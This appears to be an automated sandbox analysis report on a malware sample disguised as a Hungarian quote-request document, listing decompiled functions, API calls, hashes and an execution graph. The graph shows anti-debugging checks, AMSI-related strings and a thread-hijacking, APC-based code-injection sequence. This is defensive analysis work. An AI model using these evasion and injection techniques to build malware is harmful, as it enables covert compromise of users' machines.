                                                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                                                  • Opcode ID: 9855b14fcd6a6941155ba2d7834952a667d84b6a926568ae599d78c4bd9249bc
                                                                                                                                                  • Instruction ID: 6eedd8d14bb9c44dcc7de0ab37b2c68dba4ee468ca3a40a5480be72a1ba20ef5
                                                                                                                                                  • Opcode Fuzzy Hash: 9855b14fcd6a6941155ba2d7834952a667d84b6a926568ae599d78c4bd9249bc
                                                                                                                                                  • Instruction Fuzzy Hash: 8941D2B07043544BEB12EB7988B46BEB3FBEFC5200B545929D452C3344EB64DD01CAE5
                                                                                                                                                  Function 029B7E50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • RtlMoveMemory.NTDLL(?,?,?), ref: 029B7ED7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$MemoryMove
                                                                                                                                                  • String ID: Ntdll$RtlM$oveM
                                                                                                                                                  • API String ID: 2705147948-1610840992
                                                                                                                                                  • Opcode ID: e7921aa75346ee3326d806f6fe7e2edc78acd1d431a90a6755669425a79ace45
                                                                                                                                                  • Instruction ID: 1e761a9b3084131a825c0fa956098a5a9de9f63451f3eccb8b42a5e258ab7f68
                                                                                                                                                  • Opcode Fuzzy Hash: e7921aa75346ee3326d806f6fe7e2edc78acd1d431a90a6755669425a79ace45
                                                                                                                                                  • Instruction Fuzzy Hash: 93017535684344BFF702DBD8DE16FEAB7D9EFC8B00F5104A0F801AA580CA70AE104A64
                                                                                                                                                  Function 029B81CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc
                                                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                  • API String ID: 1883125708-1952140341
                                                                                                                                                  • Opcode ID: 7fe202154cec35ed7270ae40e63b3cc2e9fb7a26df58c2677a0f7601e4f4f1f3
                                                                                                                                                  • Instruction ID: 2aa9c84b5c62eabd57f9d6d0afd7e47dd145d159b08d34e2c32edb4ccf5c14a1
                                                                                                                                                  • Opcode Fuzzy Hash: 7fe202154cec35ed7270ae40e63b3cc2e9fb7a26df58c2677a0f7601e4f4f1f3
                                                                                                                                                  • Instruction Fuzzy Hash: CDF09674E44704AFEB12EFB8DE11DA9B7EDFBCD74075244A0F800C3650DA70AE148964
                                                                                                                                                  Function 029BF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,029BFAEB,UacInitialize,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,Initialize), ref: 029BF6EE
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029BF700
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                  • API String ID: 1646373207-2367923768
                                                                                                                                                  • Opcode ID: 4f816e1e68d19a0d05605ee5b8c3639ca45362206ed527639c82b09fc8bb3fdb
                                                                                                                                                  • Instruction ID: b140934d72b0ef1654d3554994b421c1cd1f14db3306eb0f6217fe939774ceb0
                                                                                                                                                  • Opcode Fuzzy Hash: 4f816e1e68d19a0d05605ee5b8c3639ca45362206ed527639c82b09fc8bb3fdb
                                                                                                                                                  • Instruction Fuzzy Hash: FED012A23603502AFE0176FC2DD4859238C8DE562E3280EA0B022CA8D2E6A68A1A5094
                                                                                                                                                  Function 029AC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,029CD10B,00000000,029CD11E), ref: 029AC47A
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 029AC48B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                                  • Opcode ID: 021136061a18b6321c2234e0655b2fd2d21d289411c0ccc2b92847439142a17d
                                                                                                                                                  • Instruction ID: c9e671dab9d6894de4df5f3df1db6b5eaf04c15fcc8c9536832052cbd8b91fb2
                                                                                                                                                  • Opcode Fuzzy Hash: 021136061a18b6321c2234e0655b2fd2d21d289411c0ccc2b92847439142a17d
                                                                                                                                                  • Instruction Fuzzy Hash: AFD09EA1A4C3455AEB00AAB554E563536DC9798314B244826E4469D142E76654108FD8
                                                                                                                                                  Function 029AE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029AE297
                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029AE2B3
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029AE32A
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 029AE353
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 920484758-0
                                                                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                  • Instruction ID: 009b9e2cbe92bbd02d269fafa6326f818813720109acf858ff7c12fe9e7dcb80
                                                                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                  • Instruction Fuzzy Hash: EB410075A013299FCB62DB58CCA0BC9B3BDAF49314F0045E5E948A7211DA34AF818FA0
                                                                                                                                                  Function 029AAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029AAD59
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029AAD7D
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029AAD98
                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029AAE2E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                                  • Opcode ID: a35d5faaa15e9643623e12f70ec0b589991b5379517790a9f8ec26f8094c32c6
                                                                                                                                                  • Instruction ID: 83e9f050e297c6163ec1923e4248316d944a7931c3193d9a22bdcb8e6c51c443
                                                                                                                                                  • Opcode Fuzzy Hash: a35d5faaa15e9643623e12f70ec0b589991b5379517790a9f8ec26f8094c32c6
                                                                                                                                                  • Instruction Fuzzy Hash: D5415A70A403589BDB61DF68CC94BDAB7FDAB48300F0440E6A548E7241DB74AF84CF94
                                                                                                                                                  Function 029AAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029AAD59
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029AAD7D
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029AAD98
                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029AAE2E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                                  • Opcode ID: b91cd70b95a841182afdcb21fd5cf5a578c77c9ffc3bdde78122543148cd8598
                                                                                                                                                  • Instruction ID: 2ffd54c9b1333d4faae2fcfcee04bcca097712f70360391c073cddce5a217e46
                                                                                                                                                  • Opcode Fuzzy Hash: b91cd70b95a841182afdcb21fd5cf5a578c77c9ffc3bdde78122543148cd8598
                                                                                                                                                  • Instruction Fuzzy Hash: 04414870A403589FDB61EB68CC94BDAB7FDAB98300F4444E5A548E7241DB74AF88CF94
                                                                                                                                                  Function 029A1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea54a9de0347c6141ed6c7d30e55b2078b589c1b8b173b3420e379a7d080ad19
                                                                                                                                                  • Instruction ID: 57318a01134b5fa09dcc18cfabdf06d67ae7ca91dbff690f67137bdb44a312f7
                                                                                                                                                  • Opcode Fuzzy Hash: ea54a9de0347c6141ed6c7d30e55b2078b589c1b8b173b3420e379a7d080ad19
                                                                                                                                                  • Instruction Fuzzy Hash: B3A1F6667107100BD718AA7C9CA43BDB3DADFC4365F29827EE11DCB381EB68C94686D0
                                                                                                                                                  Function 029A94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,029A95DA), ref: 029A9572
                                                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,029A95DA), ref: 029A9578
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                                  • String ID: yyyy
                                                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                                                  • Opcode ID: ae7fa0ca268adbce8c766dd81a2feab530d893e3dd297e7c68701dc7a6a58eb4
                                                                                                                                                  • Instruction ID: 5529e6c113db7fbcf8d3474eb8c9f185640b0e42a34303aad9238baccc6b3744
                                                                                                                                                  • Opcode Fuzzy Hash: ae7fa0ca268adbce8c766dd81a2feab530d893e3dd297e7c68701dc7a6a58eb4
                                                                                                                                                  • Instruction Fuzzy Hash: 8E214B71A043589FEB10DFA8C9A2AAEB3F9FF89700F5114A5EC05E7240D7709E40CAE5
                                                                                                                                                  Function 029B8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029B83C2), ref: 029B83A4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                  • API String ID: 3811539418-184458249
                                                                                                                                                  • Opcode ID: 77e472120d533abd6cceaa3c0b3c38880da307ff52db86eb8ee5b18b4cda39bc
                                                                                                                                                  • Instruction ID: 9ce20ba1c320e0eb6f9b70bb1630756cfd6f885872afadff3ecf126215732264
                                                                                                                                                  • Opcode Fuzzy Hash: 77e472120d533abd6cceaa3c0b3c38880da307ff52db86eb8ee5b18b4cda39bc
                                                                                                                                                  • Instruction Fuzzy Hash: 0F01AD30640304AFEB11EFA8DE61FAAB7EDFB8CB00F515460F900D6240CA70AE108F64
                                                                                                                                                  Function 029BAF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BAF58
                                                                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 029BAF88
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 029BAFA7
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BAFB3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Read$Write
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3448952669-0
                                                                                                                                                  • Opcode ID: 0842f42538510887f6bc99ff4f81f5882a90e14e8419f97fd24a7733c12119fe
                                                                                                                                                  • Instruction ID: 7600598e579623278b54ab0ab17f22bbfcdf9276804421122e7af8ce41b349e2
                                                                                                                                                  • Opcode Fuzzy Hash: 0842f42538510887f6bc99ff4f81f5882a90e14e8419f97fd24a7733c12119fe
                                                                                                                                                  • Instruction Fuzzy Hash: 962184B264071A9BDF11DF6ACD84BEE77B9EF84351F044521FD1497380D734E9118AA4

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:8.4%
                                                                                                                                                  Signature Coverage:1.4%
                                                                                                                                                  Total number of Nodes:369
                                                                                                                                                  Total number of Limit Nodes:50
                                                                                                                                                  execution_graph 103916 3651cb84 103919 3651a042 103916->103919 103918 3651cba5 103920 3651a06b 103919->103920 103921 3651a182 NtQueryInformationProcess 103920->103921 103929 3651a577 103920->103929 103922 3651a1ba 103921->103922 103923 3651a2fc NtSuspendThread 103922->103923 103925 3651a1ef 103922->103925 103924 3651a30d 103923->103924 103926 3651a331 103923->103926 103924->103918 103925->103918 103928 3651a4a6 NtSetContextThread 103926->103928 103931 3651a4f2 103926->103931 103927 3651a552 NtResumeThread NtClose 103927->103929 103930 3651a4bd 103928->103930 103929->103918 103930->103931 103932 3651a4da NtQueueApcThread 103930->103932 103931->103927 103932->103931 103934 47df110 103937 47db940 103934->103937 103938 47db966 103937->103938 103945 47c9d40 103938->103945 103940 47db972 103941 47db993 103940->103941 103951 47cc1c0 103940->103951 103943 47db985 103983 47da680 103943->103983 103986 47c9c90 103945->103986 103947 47c9d54 103947->103940 103948 47c9d4d 103948->103947 103993 47cf180 103948->103993 103953 47cc1e5 103951->103953 103952 47cc4b3 103952->103943 103953->103952 104232 47d43a0 103953->104232 103955 47cc2a7 103955->103952 104235 47c8a60 103955->104235 103957 47cc2eb 103957->103952 104242 47da4d0 103957->104242 103961 47cc341 103962 47cc348 103961->103962 104253 47d9fe0 103961->104253 103963 47dbd90 RtlFreeHeap 103962->103963 103965 47cc355 103963->103965 103965->103943 103967 47cc392 103968 47dbd90 RtlFreeHeap 103967->103968 103969 47cc399 103968->103969 103969->103943 103970 47cc3a2 103971 47cf4a0 2 API calls 103970->103971 103972 47cc416 103971->103972 103972->103962 103973 47cc421 103972->103973 103974 47dbd90 RtlFreeHeap 103973->103974 103975 47cc445 103974->103975 104257 47da030 103975->104257 103978 47d9fe0 LdrInitializeThunk 103979 47cc480 103978->103979 103979->103952 104261 47d9df0 103979->104261 103982 47da680 ExitProcess 103982->103952 103984 47daf30 103983->103984 103985 47da69f ExitProcess 103984->103985 103985->103941 103988 47c9ca3 103986->103988 103987 47c9cb6 103987->103948 103988->103987 104001 47db280 103988->104001 103990 47c9cf3 103990->103987 104012 47c9ab0 103990->104012 103992 47c9d13 103992->103948 103994 47cf199 103993->103994 104000 47c9d65 103994->104000 104224 47da7a0 103994->104224 103996 47cf1d2 103999 47cf1fd 103996->103999 104227 47da230 103996->104227 103998 47da460 NtClose 103998->104000 103999->103998 104000->103940 104002 47db299 104001->104002 104018 47d4a50 104002->104018 104004 47db2b1 104005 47db2ba 104004->104005 104047 47db0c0 104004->104047 104005->103990 104007 47db2ce 104007->104005 104061 47d9ed0 104007->104061 104203 47c7ea0 104012->104203 104014 47c9ad1 104014->103992 104015 47c9aca 104015->104014 104216 47c8160 104015->104216 104019 47d4a64 104018->104019 104020 47d4b73 104018->104020 104019->104020 104068 47da330 104019->104068 104020->104004 104022 47d4bb7 104023 47dbd90 RtlFreeHeap 104022->104023 104027 47d4bc3 